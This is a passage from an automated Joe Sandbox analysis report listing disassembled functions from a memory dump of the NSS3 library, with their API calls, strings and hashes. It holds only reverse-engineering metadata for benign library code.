free.MOZGLUE(?), ref: 6C777D9C
CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6C777DB8
PR_SetError.NSS3(FFFFE023,00000000), ref: 6C777E19

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
String ID:
API String ID: 70581797-0
Opcode ID: b09d1351dbf7a5add1a79aa9406d7fa17176a46d0e5a1ab2706943b98e363e33
Instruction ID: 04035622bd148882b788752a7165f3523ef5011a0e1f48fcaf0065b22de4f393
Opcode Fuzzy Hash: b09d1351dbf7a5add1a79aa9406d7fa17176a46d0e5a1ab2706943b98e363e33
Instruction Fuzzy Hash: 2841C272A0011E9BDF218E699F46AAA33A4EF4135CF050574EC19ABB51E730E919C6F1

Function 6C787EB0 Relevance: 13.6, APIs: 9, Instructions: 124threadCOMMON

Download Yara Rule

APIs

free.MOZGLUE(?,00000000,00000000,?,?,?,6C7880DD), ref: 6C787F15
DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,6C7880DD), ref: 6C787F36
free.MOZGLUE(?,?,?,6C7880DD), ref: 6C787F3D
SECOID_Shutdown.NSS3(00000000,00000000,?,?,?,6C7880DD), ref: 6C787F5D
DeleteCriticalSection.KERNEL32(?,6C7880DD), ref: 6C787F94
free.MOZGLUE(?), ref: 6C787F9B
PR_SetError.NSS3(FFFFE08B,00000000,6C7880DD), ref: 6C787FD0
PR_SetThreadPrivate.NSS3(FFFFFFFF,00000000,6C7880DD), ref: 6C787FE6
free.MOZGLUE(?,6C7880DD), ref: 6C78802D

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection$ErrorPrivateShutdownThread
String ID:
API String ID: 4037168058-0
Opcode ID: bf1e0240a2c3bb9b900a2506d30aa36bb6b0a9d4282103cc9c0848bdf59c9e03
Instruction ID: 3596fa0c9325e3c0d7bf955552e460d239d69322cd6f0fa0607cd3f7a2f6af00
Opcode Fuzzy Hash: bf1e0240a2c3bb9b900a2506d30aa36bb6b0a9d4282103cc9c0848bdf59c9e03
Instruction Fuzzy Hash: 6141D7B1B021108BDF309FB9998DA4A37B9AB4635CF154239E61687B41D734F816CBE1

Function 6C7CFEE0 Relevance: 13.6, APIs: 9, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7CFF00

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PORT_ArenaMark_Util.NSS3(?), ref: 6C7CFF18
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C7CFF26
PORT_ArenaMark_Util.NSS3(?), ref: 6C7CFF4F
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C7CFF7A
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C7CFF8C

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_Mark_$ErrorValuememset
String ID:
API String ID: 1233137751-0
Opcode ID: 0c465f591ed90667cc43c8a1a83af1ee4fd4e76798820a0dc4a82feaf2243ade
Instruction ID: 1d2421af2cafe61feb2f3c6d8059ba9592a40a2c586cc5d954acb76f0a960027
Opcode Fuzzy Hash: 0c465f591ed90667cc43c8a1a83af1ee4fd4e76798820a0dc4a82feaf2243ade
Instruction Fuzzy Hash: DE3133B2A013139FE7208E598E44B5A76A8EF46348F164139EC1897B40FB30E904C7E2

Function 6C7D3CA0 Relevance: 13.6, APIs: 9, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,-00000001,?,00000000,?,6C7D38BD), ref: 6C7D3CBE
PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,?,-00000001,?,00000000,?,6C7D38BD), ref: 6C7D3CD1

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,6C7D38BD), ref: 6C7D3CF0
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6C8AB369,000000FF,00000000,00000000,?,000000FF,00000000,00000000,6C7D38BD), ref: 6C7D3D0B
PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,6C7D38BD), ref: 6C7D3D1A
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6C8AB369,000000FF,00000000,00000000,00000000,6C7D38BD), ref: 6C7D3D38
_wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000), ref: 6C7D3D47
free.MOZGLUE(00000000), ref: 6C7D3D62
free.MOZGLUE(000000FF,?,000000FF,00000000,00000000,6C7D38BD), ref: 6C7D3D6F

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_Utilfree$Value_wfopenmalloc
String ID:
API String ID: 2345246809-0
Opcode ID: 07360b72eb5c68f7cc8d6b8a3c44404fa6a6a779e26ea8cc1e94b2d2e794a989
Instruction ID: d17002758bfe6b4a04482af7f9fc283891e73b8e970b35609e255edfc23a69b1
Opcode Fuzzy Hash: 07360b72eb5c68f7cc8d6b8a3c44404fa6a6a779e26ea8cc1e94b2d2e794a989
Instruction Fuzzy Hash: 9B2107B570111277FB206B7B4D0AE7B39BCDB826A9F150235B839D7AC1DA60D800C6B1

Function 6C717D70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C717E27
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C717E67
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6C717EED
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C717F2E

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C717ED8, 6C717F08, 6C717F19
database corruption, xrefs: 6C717EE2, 6C717F23
%s at line %d of [%.10s], xrefs: 6C717EE7, 6C717F28

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: d9f54682ea1c50c821fee0f97db3834053974b65a578cecdeb6a08523ccf7b9d
Instruction ID: 7440f3be0998b84e178b44dcee7be5e402fc808b00854034fe2dfd9759e5cb2b
Opcode Fuzzy Hash: d9f54682ea1c50c821fee0f97db3834053974b65a578cecdeb6a08523ccf7b9d
Instruction Fuzzy Hash: EC61B274A082459FCB15CF69C981BAA37A6BF45308F1848B8EC095FB52D730EC56CBA0

Function 6C6FFCF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6FFD7A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6FFD94
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6FFE3C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6FFE83

Part of subcall function 6C6FFEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6C6FFEFA
Part of subcall function 6C6FFEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6C6FFF3B

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6FFD64, 6C6FFE26
database corruption, xrefs: 6C6FFD6E, 6C6FFE30
%s at line %d of [%.10s], xrefs: 6C6FFD73, 6C6FFE35

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1169254434-598938438
Opcode ID: ba3850c80cfd7070b5d360c10bb169ce92661e41ec9e4f89349d401c6743d39b
Instruction ID: e6b0dfefd6967c00d40957b66a648656a91fe7a10d9e949f3bec825aa8a44b99
Opcode Fuzzy Hash: ba3850c80cfd7070b5d360c10bb169ce92661e41ec9e4f89349d401c6743d39b
Instruction Fuzzy Hash: 70518271A002059FDB14CFA9C9D0AAEB7F2FF48308F144469E915AB752E735EC42CBA5

Function 6C842F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C842FFD
sqlite3_initialize.NSS3 ref: 6C843007
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C843032
sqlite3_mprintf.NSS3(6C8AAAF9,?), ref: 6C843073
sqlite3_free.NSS3(?), ref: 6C8430B3
sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6C8430C0

Strings

sqlite3_get_table() called with two or more incompatible queries, xrefs: 6C8430BB

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
String ID: sqlite3_get_table() called with two or more incompatible queries
API String ID: 750880481-4279182443
Opcode ID: 44a7acfdd82102bfa5539899616173b9967965a17be317b82edc4a23e690c8fa
Instruction ID: 54ee2b41969ed3d340378489feef394f8c43e29f76ce66326c12ff2797331fc6
Opcode Fuzzy Hash: 44a7acfdd82102bfa5539899616173b9967965a17be317b82edc4a23e690c8fa
Instruction Fuzzy Hash: 2E41C17160060AAFDB20CF25D984A8AB7E5FF44369F14CA28EC2987B40E731F955CBD1

Function 6C7C5ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 80stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(q]|l), ref: 6C7C5F0A
TlsGetValue.KERNEL32 ref: 6C7C5F1F
EnterCriticalSection.KERNEL32(89000904), ref: 6C7C5F2F
PR_Unlock.NSS3(890008E8), ref: 6C7C5F55
PR_SetError.NSS3(00000000,00000000), ref: 6C7C5F6D
SECMOD_UpdateSlotList.NSS3(8B4274C0), ref: 6C7C5F7D

Part of subcall function 6C7C5220: TlsGetValue.KERNEL32(00000000,890008E8,?,6C7C5F82,8B4274C0), ref: 6C7C5248
Part of subcall function 6C7C5220: EnterCriticalSection.KERNEL32(0F6C890D,?,6C7C5F82,8B4274C0), ref: 6C7C525C
Part of subcall function 6C7C5220: PR_SetError.NSS3(00000000,00000000), ref: 6C7C528E
Part of subcall function 6C7C5220: PR_Unlock.NSS3(0F6C88F1), ref: 6C7C5299
Part of subcall function 6C7C5220: free.MOZGLUE(00000000), ref: 6C7C52A9

Strings

q]|l, xrefs: 6C7C5EDB, 6C7C5F09

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue$ListSlotUpdatefreestrlen
String ID: q]|l
API String ID: 3150690610-1361952399
Opcode ID: 87d4f48e44580f6a36ee2ff8011e66c8cdbce53358c784e0cbd5442997e9bf2e
Instruction ID: 6c07686f9f0ef2ffeaf0a9c679904eee60b3d1a2a47bfc0b5adef7bc5cac1b84
Opcode Fuzzy Hash: 87d4f48e44580f6a36ee2ff8011e66c8cdbce53358c784e0cbd5442997e9bf2e
Instruction Fuzzy Hash: 4021E7B5D002059FDB14AF68ED45AEEB7F4EF09318F540039E90AA7B01E732A954CBD1

Function 6C788CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6C79124D,00000001), ref: 6C788D19
EnterCriticalSection.KERNEL32(?,?,?,?,6C79124D,00000001), ref: 6C788D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6C79124D,00000001), ref: 6C788D73
PR_Unlock.NSS3(?,?,?,?,?,6C79124D,00000001), ref: 6C788D8C

Part of subcall function 6C81DD70: TlsGetValue.KERNEL32 ref: 6C81DD8C
Part of subcall function 6C81DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DDB4

PR_Unlock.NSS3(?,?,?,?,?,6C79124D,00000001), ref: 6C788DBA

Strings

KRAM, xrefs: 6C788D3E
KRAM, xrefs: 6C788CF9

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: 4c4c65a12a014b0ee354923983b23d46c4bc6f4cfcde25ad69dae1db1eca1482
Instruction ID: 51350dacd2271357fa5deb661e0f4462f43acd3052176adaa4bd8fa00e4adba7
Opcode Fuzzy Hash: 4c4c65a12a014b0ee354923983b23d46c4bc6f4cfcde25ad69dae1db1eca1482
Instruction Fuzzy Hash: 8F21A1B5A056018FCB10EF39C68565AB7F0FF59318F15897ADA88CBB01D730E841CBA1

Function 6C7AACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C7AACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7AAD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7AAD23

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7AAD39

Strings

C_MessageDecryptFinal, xrefs: 6C7AACE1
hSession = 0x%x, xrefs: 6C7AACFE, 6C7AAD0E
(CK_INVALID_HANDLE), xrefs: 6C7AAD1C

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
API String ID: 332880674-3521875567
Opcode ID: a4d325ad8044793334164e9ee2fe2b33f22a3c4fd2fc4a8b9b603e1ff0567fab
Instruction ID: f3cc91426caa97d8c8f9b51e64ff0b730f02f9ae6590a7cb2cf7df0bc7125c20
Opcode Fuzzy Hash: a4d325ad8044793334164e9ee2fe2b33f22a3c4fd2fc4a8b9b603e1ff0567fab
Instruction Fuzzy Hash: 9A210D71601154AFDB309B98DF8DB6A7375AB4232DF044539E80A97B12DB34BC0ACBD2

Function 6C880ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C880EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C880EFA

Part of subcall function 6C76AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C76AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C880F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C880F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C880F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C880F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6C880ED9, 6C880EE5, 6C880F06, 6C880F0B
Aborting, xrefs: 6C880EB3

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: 3b5efcb8b58fd8cb847df5acbc3905236a6dec5fa1f809cdbd1bf790cf498bcc
Instruction ID: d404a3d5549d2bd11ac4f9b64d8def5ad8c1973ce66d26a33ae11939493f2463
Opcode Fuzzy Hash: 3b5efcb8b58fd8cb847df5acbc3905236a6dec5fa1f809cdbd1bf790cf498bcc
Instruction Fuzzy Hash: FF01ADB6901114ABDF21AF68DD898AB3B3CEF46368B004464FD0997B02D731EA50C6E2

Function 6C861C40 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 45COMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,w=vl,?,?,6C764E1D), ref: 6C861C8A
sqlite3_free.NSS3(00000000), ref: 6C861CB6

Strings

non-deterministic use of %s() in %s, xrefs: 6C861C85
a generated column, xrefs: 6C861C6C
an index, xrefs: 6C861C67
a CHECK constraint, xrefs: 6C861C76, 6C861C81
w=vl, xrefs: 6C861C44

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_freesqlite3_mprintf
String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s$w=vl
API String ID: 1840970956-2462903661
Opcode ID: 950c002dc53bbaae2827cdcf36383f8fc8306a432ab9d1947ff18b4d81e91045
Instruction ID: 946e7914d8b7270e42c42b074444d33cd1e17d749d1774f765fd1914386cb24f
Opcode Fuzzy Hash: 950c002dc53bbaae2827cdcf36383f8fc8306a432ab9d1947ff18b4d81e91045
Instruction Fuzzy Hash: 150124B1A001405BD720BA68D9029B177E6EF8634CB550C7DE9858BB03EA22E86BC791

Function 6C844D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C844DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C844DE0

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C844DCB
invalid, xrefs: 6C844DB8
API call with %s database connection pointer, xrefs: 6C844DBD
%s at line %d of [%.10s], xrefs: 6C844DDA
misuse, xrefs: 6C844DD5

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

